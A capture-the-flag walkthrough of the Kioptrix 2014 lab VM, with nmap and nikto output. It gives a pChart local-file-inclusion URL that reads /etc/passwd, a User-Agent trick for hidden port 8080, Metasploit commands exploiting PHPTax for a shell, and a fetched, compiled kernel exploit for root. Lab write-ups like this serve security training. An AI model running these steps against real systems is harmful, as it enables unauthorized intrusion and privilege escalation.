Name: Kioptrix: 2014 (#5)
Date release: 6 Apr 2014
Author: Kioptrix
Series: Kioptrix
Web page: http://www.kioptrix.com/blog/a-new-vm-after-almost-2-years/
Vulnhub: https://www.vulnhub.com/entry/kioptrix-2014-5,62/
Host Discovery
ARP
arp-scan -l
Ping
ping 192.168.0.25
Port Scanning
TCP
nmap -sS -A -sC -sV -O -p0- 192.168.0.25 -oA nmap_tcp_full_verOSscript
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Nmap scan report for 192.168.0.25
Host is up (0.00057s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: Site doesn't have a title (text/html).
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:24:BF:7F (VMware)
Device type: VoIP adapter|WAP|firewall|general purpose|storage-misc|broadband router
Running: Cisco embedded, Linux 2.4.X|2.6.X, Netgear RAIDiator 4.X, Sun OpenSolaris, Vonage embedded, Zhone embedded
OS CPE: cpe:/h:cisco:unified_call_manager cpe:/o:linux:linux_kernel:2.4.36 cpe:/o:linux:linux_kernel:2.6.26 cpe:/o:linux:linux_kernel:2.6.18 cpe:/o:netgear:raidiator:4.1.4 cpe:/o:sun:opensolaris cpe:/h:vonage:v-portal cpe:/h:zhone:6211-i3
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.57 ms 192.168.0.25
UDP
nmap -sU -n 192.168.0.25 -oA nmap_udp_def
1
2
3
4
Nmap scan report for 192.168.0.25
Host is up (0.00071s latency).
All 1000 scanned ports on 192.168.0.25 are open|filtered
MAC Address: 00:0C:29:24:BF:7F (VMware)
Service Enumeration
80 - HTTP
http://192.168.0.20
| ` nikto -h 192.168.0.25:80 | tee nikto.txt` |
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.0.25
+ Target Hostname: 192.168.0.25
+ Target Port: 80
+ Start Time: 2017-06-21 08:58:22 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ 8346 requests: 1 error(s) and 11 item(s) reported on remote host
+ End Time: 2017-06-21 09:00:04 (GMT-4) (102 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
page source has some juciy info
pChart 2.1.3
We also get a URL to the app
http://192.168.0.25/pChart2.1.3/examples/index.php
8080 - HTTP
http://192.168.0.20:8080
Cant access this.
Exploitation
pChart- Local File Inclusion
Using searchsploit we find an exploit that looks usable for pChart
Exploit Used: https://www.exploit-db.com/exploits/31173/
There is a Local File Inclusion vulnerability which looks good to pull out.
/etc/passwd
http://192.168.0.25/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
at this point i was slowly running out of ideas here so did some google fu.
httpd.conf
At the bottom of the config we see some bits which suggests we need to change our user agent to connect on port 8080
1
2
3
4
5
6
7
8
9
10
11
<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2
<Directory "/usr/local/www/apache22/data2">
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>
</VirtualHost>
PHPTAX - Remote Code Execution
Using curl we change the User-Agent to try and access the webapp.
curl -H "User-Agent:Mozilla/4.0" http://192.168.0.25:8080
curl -H "User-Agent:Mozilla/4.0" http://192.168.0.25:8080/phptax/
too messy lets look at it in Firefox. curl wasnt the best here
First we change the user agent following the advice below
https://superuser.com/questions/98798/how-do-i-change-firefoxs-user-agent-via-aboutconfig
setting the newly created string variable in Firefox general.useragent.override to Mozilla/4.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0.
http://192.168.0.25:8080/phptax/
looks pretty cool
I tried a few exploits but didnt get anywhere. Metasploit was used
use exploit/multi/http/phptax_exec
set RPORT 8080
set URI /phptax/
set RHOST 192.168.0.25
run
after setting up and running it we successfully get a shell as user www
Privilege Esculation
after fumbling around in the limited shell and getting information we find a a priv esc exploit
Exploit Used: https://www.exploit-db.com/exploits/26368/
netcat was on the machine but was giving me greif. I tried to setup a FTP server but nope.
In the end fetch was available and we was able to move the code over to the box :D
after pulling down the file using gcc to compile it and run
all is well andβ¦β¦.
got root π π π
so lets get the flag
